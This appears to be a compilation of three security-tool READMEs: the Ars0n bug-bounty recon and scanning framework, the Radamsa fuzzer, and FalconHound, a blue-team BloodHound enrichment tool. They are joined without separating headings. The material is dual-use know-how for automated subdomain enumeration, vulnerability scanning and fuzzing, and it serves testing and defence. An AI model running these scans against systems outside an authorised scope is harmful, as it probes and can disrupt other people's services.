Howdy! My name is Harrison Richardson, or rs0n
(arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.
The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make π° doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.
In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py
or slowburn.py
) is basically an algorithm that runs the Modules (Ex: fire-starter.py
or fire-scanner.py
) in a specific patter for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.
My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!
Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:
sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.
Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.
./install.sh
This video shows exactly what to expect from a successful installation.
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./install.sh --arm
You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys
directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.
Once the installation is complete, you will be given the option to run the application by entering Y
. If you choose not the run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directly and run the run.sh
bash script.
./run.sh
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./run.sh --arm
The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.
At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.
How it works:
Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.
Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has complete to move from Recon to Enumeration.
Running Wildfire:
Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.
Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan form the CLI.
All Core Modules for The Ars0n Framework are stored in the /toolkit
directory. Simply navigate to the directory and run wildfire.py
with the necessary flags. At least one Sub-Module flag must be provided.
python3 wildfire.py --start --cloud --scan
Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.
Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.
In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various API's and deposits them into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.
To initalize Slowburn, simply run the following command:
python3 slowburn.py --initialize
Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.
Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.
If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:
python3 slowburn.py
The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.
Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.
Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASN's to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:
These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.
Once the scan is complete, the Dashboard will be updated and available to the user.
Most Sub-Modules in The Ars0n Framework requre the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
Coming soon...
Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.
At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.
The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.
It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools have their own ways of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why running The Ars0n Framework should only be run on a clean installation of Kali Linux.
Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.
Coming soon...
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and, easy to get up and running.
$ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa
Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers.
Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen.
There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.
Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.
Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.
Supported operating systems: * GNU/Linux * OpenBSD * FreeBSD * Mac OS X * Windows (using Cygwin)
Software requirements for building from sources: * gcc / clang * make * git * wget
$ git clone https://gitlab.com/akihe/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help
Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.
This section assumes some familiarity with UNIX scripting.
Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.
Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.
In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe.
$ echo "aaa" | radamsa
aaaa
Here radamsa decided to add one 'a' to the input. Let's try that again.
$ echo "aaa" | radamsa
Λaaa
Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.
$ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296
This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.
You can generate more than one output by using the -n parameter as follows:
$ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
1 + (2 + (3 + 170141183460469231731687303715884105727))
There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.
What we have so far can be used to for example test programs that read input from standard input, as in
$ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
[...]
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted
[hang]
Or the compiler used to compile Radamsa:
$ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
[...]
> What is 'Γ³ Β΅'?
4901126677
> $
Or to test decompression:
$ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null
Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:
$ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done
Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:
$ gzip -c /bin/bash > sample.gz
$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done
This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.
One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.
$ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
3
10
5
$ while true
do
radamsa -o fuzz-%n -n 100 sample-*
bc fuzz-* < /dev/null
test $? -gt 127 && break
done
This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.
In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.
The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:
-o argument | meaning | example |
---|---|---|
:port | act as a TCP server in given port | # radamsa -o :80 -n inf samples/*.http-resp |
ip:port | connect as TCP client to port of ip | $ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req |
- | write to stdout | $ radamsa -o - samples/*.vt100 |
path | write to files, %n is testcase # and %s the first suffix | $ radamsa -o test-%n.%s -n 100 samples/*.foo |
Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.
A non-exhaustive list of free complementary tools:
A non-exhaustive list of related free tools: * American fuzzy lop (http://lcamtuf.coredump.cx/afl/) * Zzuf (http://caca.zoy.org/wiki/zzuf) * Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/) * Peach (http://peachfuzzer.com/) * Sulley (http://code.google.com/p/sulley/)
Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable from via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.
A robustness testing tool is obviously only good only if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.
The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVE:s should be read as 'product X is now more robust (against Y)'.
CVE | program | credit |
---|---|---|
CVE-2007-3641 | libarchive | OUSPG |
CVE-2007-3644 | libarchive | OUSPG |
CVE-2007-3645 | libarchive | OUSPG |
CVE-2008-1372 | bzip2 | OUSPG |
CVE-2008-1387 | ClamAV | OUSPG |
CVE-2008-1412 | F-Secure | OUSPG |
CVE-2008-1837 | ClamAV | OUSPG |
CVE-2008-6536 | 7-zip | OUSPG |
CVE-2008-6903 | Sophos Anti-Virus | OUSPG |
CVE-2010-0001 | Gzip | integer underflow in unlzw |
CVE-2010-0192 | Acroread | OUSPG |
CVE-2010-1205 | libpng | OUSPG |
CVE-2010-1410 | Webkit | OUSPG |
CVE-2010-1415 | Webkit | OUSPG |
CVE-2010-1793 | Webkit | OUSPG |
CVE-2010-2065 | libtiff | found by CERT-FI |
CVE-2010-2443 | libtiff | found by CERT-FI |
CVE-2010-2597 | libtiff | found by CERT-FI |
CVE-2010-2482 | libtiff | found by CERT-FI |
CVE-2011-0522 | VLC | found by Harry Sintonen |
CVE-2011-0181 | Apple ImageIO | found by Harry Sintonen |
CVE-2011-0198 | Apple Type Services | found by Harry Sintonen |
CVE-2011-0205 | Apple ImageIO | found by Harry Sintonen |
CVE-2011-0201 | Apple CoreFoundation | found by Harry Sintonen |
CVE-2011-1276 | Excel | found by Nicolas GrΓ©goire of Agarri |
CVE-2011-1186 | Chrome | OUSPG |
CVE-2011-1434 | Chrome | OUSPG |
CVE-2011-2348 | Chrome | OUSPG |
CVE-2011-2804 | Chrome/pdf | OUSPG |
CVE-2011-2830 | Chrome/pdf | OUSPG |
CVE-2011-2839 | Chrome/pdf | OUSPG |
CVE-2011-2861 | Chrome/pdf | OUSPG |
CVE-2011-3146 | librsvg | found by Sauli Pahlman |
CVE-2011-3654 | Mozilla Firefox | OUSPG |
CVE-2011-3892 | Theora | OUSPG |
CVE-2011-3893 | Chrome | OUSPG |
CVE-2011-3895 | FFmpeg | OUSPG |
CVE-2011-3957 | Chrome | OUSPG |
CVE-2011-3959 | Chrome | OUSPG |
CVE-2011-3960 | Chrome | OUSPG |
CVE-2011-3962 | Chrome | OUSPG |
CVE-2011-3966 | Chrome | OUSPG |
CVE-2011-3970 | libxslt | OUSPG |
CVE-2012-0449 | Firefox | found by Nicolas GrΓ©goire of Agarri |
CVE-2012-0469 | Mozilla Firefox | OUSPG |
CVE-2012-0470 | Mozilla Firefox | OUSPG |
CVE-2012-0457 | Mozilla Firefox | OUSPG |
CVE-2012-2825 | libxslt | found by Nicolas GrΓ©goire of Agarri |
CVE-2012-2849 | Chrome/GIF | OUSPG |
CVE-2012-3972 | Mozilla Firefox | found by Nicolas GrΓ©goire of Agarri |
CVE-2012-1525 | Acrobat Reader | found by Nicolas GrΓ©goire of Agarri |
CVE-2012-2871 | libxslt | found by Nicolas GrΓ©goire of Agarri |
CVE-2012-2870 | libxslt | found by Nicolas GrΓ©goire of Agarri |
CVE-2012-2870 | libxslt | found by Nicolas GrΓ©goire of Agarri |
CVE-2012-4922 | tor | found by the Tor project |
CVE-2012-5108 | Chrome | OUSPG via NodeFuzz |
CVE-2012-2887 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5120 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5121 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5145 | Chrome | OUSPG via NodeFuzz |
CVE-2012-4186 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4187 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4188 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4202 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2013-0744 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2013-1691 | Mozilla Firefox | OUSPG |
CVE-2013-1708 | Mozilla Firefox | OUSPG |
CVE-2013-4082 | Wireshark | found by cons0ul |
CVE-2013-1732 | Mozilla Firefox | OUSPG |
CVE-2014-0526 | Adobe Reader X/XI | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2014-3669 | PHP | |
CVE-2014-3668 | PHP | |
CVE-2014-8449 | Adobe Reader X/XI | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2014-3707 | cURL | Symeon Paraschoudis |
CVE-2014-7933 | Chrome | OUSPG |
CVE-2015-0797 | Mozilla Firefox | OUSPG |
CVE-2015-0813 | Mozilla Firefox | OUSPG |
CVE-2015-1220 | Chrome | OUSPG |
CVE-2015-1224 | Chrome | OUSPG |
CVE-2015-2819 | Sybase SQL | vah_13 (ERPScan) |
CVE-2015-2820 | SAP Afaria | vah_13 (ERPScan) |
CVE-2015-7091 | Apple QuickTime | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2015-8330 | SAP PCo agent | Mathieu GELI (ERPScan) |
CVE-2016-1928 | SAP HANA hdbxsengine | Mathieu Geli (ERPScan) |
CVE-2016-3979 | SAP NetWeaver | @ret5et (ERPScan) |
CVE-2016-3980 | SAP NetWeaver | @ret5et (ERPScan) |
CVE-2016-4015 | SAP NetWeaver | @vah_13 (ERPScan) |
CVE-2016-4015 | SAP NetWeaver | @vah_13 (ERPScan) |
CVE-2016-9562 | SAP NetWeaver | @vah_13 (ERPScan) |
CVE-2017-5371 | SAP ASE OData | @vah_13 (ERPScan) |
CVE-2017-9843 | SAP NETWEAVER | @vah_13 (ERPScan) |
CVE-2017-9845 | SAP NETWEAVER | @vah_13 (ERPScan) |
CVE-2018-0101 | Cisco ASA WebVPN/AnyConnect | @saidelike (NCC Group) |
We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.
The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.
Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.
You can also drop by at #radamsa on Freenode if you have questions or feedback.
Issues your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.
Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.
Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.
Q: Will you make a graphical version of radamsa?
A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.
Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.
Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.
Q: Radamsa does not compile using the instructions in this page!
A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email (aohelin@gmail.com) or IRC (#radamsa on freenode).
Q: I used fuzzer X and found much more bugs from program Y than Radamsa did.
A: Cool. Let me know about it (aohelin@gmail.com) and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.
Q: Can I get support for using radamsa?
A: You can send email to aohelin@gmail.com or check if some of us happen to be hanging around at #radamsa on freenode.
Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.
Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.
Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.
Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.
Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.
Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.
Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.
Q: Is this the last question?
A: Yes.
Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before they are being tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.
Not safe when used as prescribed.
This product may contain faint traces of parenthesis.
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.
One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.
One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.
This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.
Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
Other examples where FalconHound can be used:
The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.
A blog detailing more on why we developed it and some use case examples can be found here
Index:
FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.
Currently, FalconHound supports the following data sources and or targets:
Additional data sources and targets are planned for the future.
At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.
Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.
Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.
The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
To run FalconHound, just run the binary and add the -go
parameter to have it run all queries in the actions folder.
./falconhound -go
To list all enabled actions, use the -actionlist
parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go
parameter.
./falconhound -actionlist -go
To run a select set of actions, use the -ids
parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go
parameter.
./falconhound -ids action1,action2,action3 -go
By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config
flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.
./falconhound -go -config /path/to/config.yml
By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir
flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.
./falconhound -go -actions-dir /path/to/actions
By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault
flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.
./falconhound -go -keyvault
Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.
The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.
The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.
There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
While most items will be fairly self explanatory,there are some important things to note about actions:
As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.
Enabled: true
This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.
Debug: false
The Query
field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform
. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.
Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:
MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription)
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name
and Enabled
fields. The Name
field is used to identify the target. The Enabled
field is used to enable or disable the target. If this is set to false, the target will be ignored.
- Name: CSV
Enabled: true
Path: path/to/filename.csv
The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields
fields are configured below.
- Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp
The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name
syntax.
The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
This is why also query output needs to be controlled, you might otherwise flood your target.
- Name: Sentinel
Enabled: true
The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.
- Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true
The WatchlistName
field is the name of the watchlist. The DisplayName
field is the display name of the watchlist.
The SearchKey
field is the column that will be used as the search key.
The Overwrite
field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.
Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: Splunk
Enabled: true
